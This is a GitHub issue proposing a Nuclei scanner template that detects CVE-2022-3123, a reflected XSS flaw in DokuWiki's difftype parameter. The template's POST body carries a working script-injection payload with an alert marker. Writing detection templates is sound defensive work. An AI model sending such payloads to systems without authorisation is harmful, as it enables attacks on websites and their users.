### ISSUE TITLE
CVE-2022-3123.yaml

### ISSUE THREAD

**Issue by ctflearner** [projectdiscovery/nuclei-templates#7263]
### Template Information:

 splitbrain/dokuwiki prior to 2022-07-31a is vulnerable to Reflected XSS. This template checks if the application is vulnerable to XSS by injecting a payload into the `difftype` parameter.

Reference :
- https://nvd.nist.gov/vuln/detail/CVE-2022-3123
- https://huntr.dev/bounties/d72a979b-57db-4201-9500-66b49a5c1345/ 
- https://github.com/dokuwiki/dokuwiki/commit/63e9a247c072008a031f9db39fa496f6aca489b6

### Nuclei Template:

```yaml
id: CVE-2022-3123
info:
  name: Reflected XSS in splitbrain/dokuwiki prior to 2022-07-31a.
  author: ctflearner
  severity: medium
  description: |
    splitbrain/dokuwiki prior to 2022-07-31a is vulnerable to Reflected XSS. This template checks if the application is vulnerable to XSS by injecting a payload into the `difftype` parameter.
  reference:
    - https://huntr.dev/bounties/d72a979b-57db-4201-9500-66b49a5c1345/
    - https://github.com/dokuwiki/dokuwiki/commit/63e9a247c072008a031f9db39fa496f6aca489b6
  classification: 
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2022-3123
     cwe-id: CWE-79
     cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:*
  tags: 
    - xss
    - dokuwiki

requests:
  - method: POST
    path: 
      - "{{baseURL}}/start"
    headers:
      Content-Type: application/x-www-form-urlencoded
      Referer: "{{baseURL}}/"
      
    body: "difftype=sidebyside'\"()%26%25<zzz><ScRiPt%20>alert(\"XSS_By_ctflearner\")</ScRiPt>&do=diff&do[diff]=1&id=ttps:start&rev2[0]=1&rev2[1]=0&sectok=1"
    matchers:
      - type: word
        part: body
        words:
          - XSS_By_ctflearner

```
